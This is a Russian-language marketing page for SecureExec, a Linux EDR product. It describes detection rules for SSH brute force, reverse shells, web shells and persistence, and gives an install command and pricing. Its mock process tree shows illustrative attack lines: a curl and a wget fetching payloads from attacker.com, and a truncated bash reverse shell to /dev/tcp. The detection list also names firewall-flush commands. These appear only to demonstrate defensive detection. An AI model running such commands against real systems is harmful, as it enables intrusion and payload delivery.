SecureExec
Главная
Решения
ЦеныБлогО нас
ВойтиРегистрация
Linux EDR · open-source agent · eBPF

Linux EDR для защиты серверов от атак

Ловим SSH brute-force, reverse shell, web shell, tampering PAM/sshd, закрепление в cron и authorized_keys, сброс firewall и изменение чувствительных файлов. Облако за 5 минут или self-hosted в вашем контуре — на ваш выбор.

Проверить 3 Linux-хоста бесплатноСкачать whitepaper · PDF
Развернуть self-hosted →

Бесплатно на 1–3 хоста · без CAPEX · отказ в любой момент

Что мы ловим на Linux

Конкретные техники атак, а не общий «мониторинг» — каждое правило сразу превращается в актуальный алерт.

SSH Brute-Force

Stateful-детекция повторных неудачных SSH-входов с одного IP во временном окне, с логикой cooldown.

Reverse Shell

Ловит shell-процессы (bash, sh, zsh), устанавливающие исходящие сетевые соединения — техника #1 пост-эксплуатации.

Web shell execution

Алерт, когда web-сервер (nginx, apache2, php-fpm, tomcat, gunicorn) порождает shell или интерпретатор — классический web shell.

Tampering PAM

Алерт на создание или изменение файлов PAM (/etc/pam.d/*) или модулей PAM не-пакетным менеджером — persistence с обходом аутентификации.

Закрепление через cron

Алерт на создание cron-задач в /etc/cron.* и /var/spool/cron/ не-системными процессами.

Изменение SSH Authorized Keys

Алерт на запись в любой файл .ssh/authorized_keys процессами, кроме ssh-copy-id.

Повышение до root

Детект смены UID на root из не-root процессов, с исключением известных системных сервисов.

Сброс firewall

Алерт на команды сброса или отключения firewall (iptables -F, nft flush ruleset, ufw disable) — defense evasion.

Побег из контейнера

Подозрительные unshare/setns/chroot/pivot_root от процессов вне известных container-runtime.

Установка за 5 минут

Подключите хост и сразу видите алерты

Один curl на сервер — и через минуту в консоли уже течёт телеметрия eBPF, через пять — отрабатывают первые встроенные правила.

1
Зарегистрируйтесь
Email, пароль, организация. Никакой кредитной карты на старте.
2
Запустите curl на хосте
Скопируйте install-команду из консоли. Агент — один статический бинарь, без зависимостей.
3
Смотрите алерты
Через ~5 минут консоль уже разбирает события и применяет встроенные правила.
Подключиться к облакуСкачать whitepaper · PDF

Облако в защищённом ЦОД РФ · TLS 1.3 · бэкапы Postgres · мониторинг 24/7

connect-host
# Подключение нового Linux-хоста к SecureExec
$ curl -fsSL https://secureexec.ru/install.sh \
| sudo INSTALL_TOKEN=<your-token> bash
=> Detecting kernel version... 6.5.0-1024-aws ✓
=> Loading eBPF programs... ✓
=> Connecting to secureexec.ru... ✓
=> Agent online, streaming events ✓
~ 60s install · agent runs as a single static binary

Полная цепочка атаки в одном таймлайне

От запуска подозрительного процесса до закрепления — каждое событие отмечено фазой kill chain, чтобы реагирование шло быстрее, чем работает атакующий.

incident-timeline
12:04:01process"sshd" → bash spawned (PID 5678)
12:04:03networkOutbound: 198.51.100.7:443 (TCP)C2
12:04:05fileFile created: /tmp/.payload.shExecution
12:04:06fileFile modified: /etc/cron.d/updatePersistence
12:04:07alertAlert: [high] Cron Persistence

Process tree, по которому видно реверс-шелл с одного взгляда

Все процессы дочерние, родительские и связанные индикаторы IOC отрисованы в виде графа. Не надо собирать дерево руками из ps и /proc.

sshd
PID 1234 · root
bash
PID 5678 · user
curl attacker.com/payload.sh
PID 5679 · user
reverse_shell
bash -i >& /dev/tcp/...
PID 5680 · user
wget attacker.com/...
PID 9012 · www-data
IOC: ip:198.51.100.7
Реагирование

Обнаружение и реагирование — не только детекция

Большинство open-source инструментов останавливаются на сборе событий. SecureExec замыкает цикл.

При обнаружении угрозы ваша команда может изолировать хост, уничтожить дерево процессов или заблокировать исполняемый файл — всё из веб-консоли. Без SSH, без ручных действий.

Сетевая изоляция
Отключите хост от сети, не теряя соединение с агентом.
Уничтожить дерево процессов
Завершите всю цепочку атаки от родительского процесса одним кликом.
Блокировка по хешу или пути
Запретите запуск известных вредоносных исполняемых файлов через fanotify — применяется мгновенно.
Глобальный блок-лист
Управляйте правилами блокировки централизованно — они автоматически применяются ко всем устройствам.

Облако или self-hosted — на ваш выбор

Один и тот же стек: облачная подписка с managed AI-аналитиком, либо Docker Compose / Kubernetes у вас в контуре.

Рекомендуем

Cloud (управляемая)

Для команд, которым важна скорость и которые не хотят держать DevOps на стек.

  • Подключение за 5 минут: signup → один curl на хост → телеметрия
  • Хостинг в защищённом облаке РФ, изолированные tenant'ы, TLS 1.3 + AES-256
  • Managed AI-аналитик включён — не платите отдельно за OpenAI/Anthropic
  • Автоматические обновления, бэкапы, мониторинг — на нас
  • Идеально для стартапов, SMB, команд без выделенного DevOps
Подключить за 5 минут

Self-Hosted (ваш контур)

Для регуляторики, ПДн и закрытых сред, где данные не должны покидать периметр.

  • Docker Compose (single-node) или Kubernetes (production-кластер), ~30 минут на разворот
  • Все данные остаются на ваших серверах, агент open-source — можно аудитить
  • Air-gapped и закрытые контуры поддерживаются
  • Свой LLM (Ollama, vLLM) или внешний API на ваш выбор
  • Идеально для банков, госсектора, телекомов и compliance-задач
Развернуть self-hosted

Простые и прозрачные цены

Начните бесплатно, масштабируйтесь по мере роста. Без скрытых платежей.

Подключение за 5 минут · хостинг и AI-аналитик включены

Cloud Community

До 3 хостов в управляемом облаке — попробуйте без риска

Бесплатно
  • До 3 Linux-хостов
  • Подключение за 5 минут (signup → curl → готово)
  • Все типы событий и 60+ правил детекции
  • Хранение событий 7 дней
  • Веб-консоль, поиск, дерево процессов
  • Managed AI-аналитик: 50 расследований/мес
  • Поддержка сообщества
ПОПУЛЯРНЫЙ

Cloud Pro

Неограниченно хостов, всё включено, для растущих команд

700 ₽/хост/мес
  • Неограниченное число Linux-хостов
  • Хостинг включён, бэкапы каждый час
  • Managed AI-аналитик включён (без лимитов)
  • Полное реагирование: изоляция, kill-tree, blocklist
  • Хранение событий 90 дней
  • Уведомления в Slack / Telegram / Email
  • 99.9% SLA · поддержка по email

Cloud Enterprise

Выделенный регион, SSO, BYOK, договор и акты

По запросу
  • Всё из Cloud Pro
  • Выделенный регион / dedicated cluster
  • SSO / SAML, ролевая модель доступа
  • BYOK (свой ключ шифрования)
  • Гибкая политика хранения данных
  • Приоритетная поддержка, расширенный SLA
  • Юр.договор, акты, ЭДО

Запустите Linux EDR на своём флоте за 5 минут

Бесплатно на 1–3 хоста, без CAPEX. Дальше — подписка per-host или self-hosted.

Подключить cloudРазвернуть self-hosted
SecureExec

SecureExec — Linux-first EDR для детекции, расследования и реагирования на инциденты на серверах. Cloud или self-hosted.

Продукт
  • Цены
Компания
  • О нас
  • Блог
  • Связаться с отделом продаж
  • Поддержка
Аккаунт
  • Войти
  • Регистрация
Правовая информация
  • Политика конфиденциальности
  • Условия использования

© 2026 SecureExec. Все права защищены.

Built with Rust & Next.js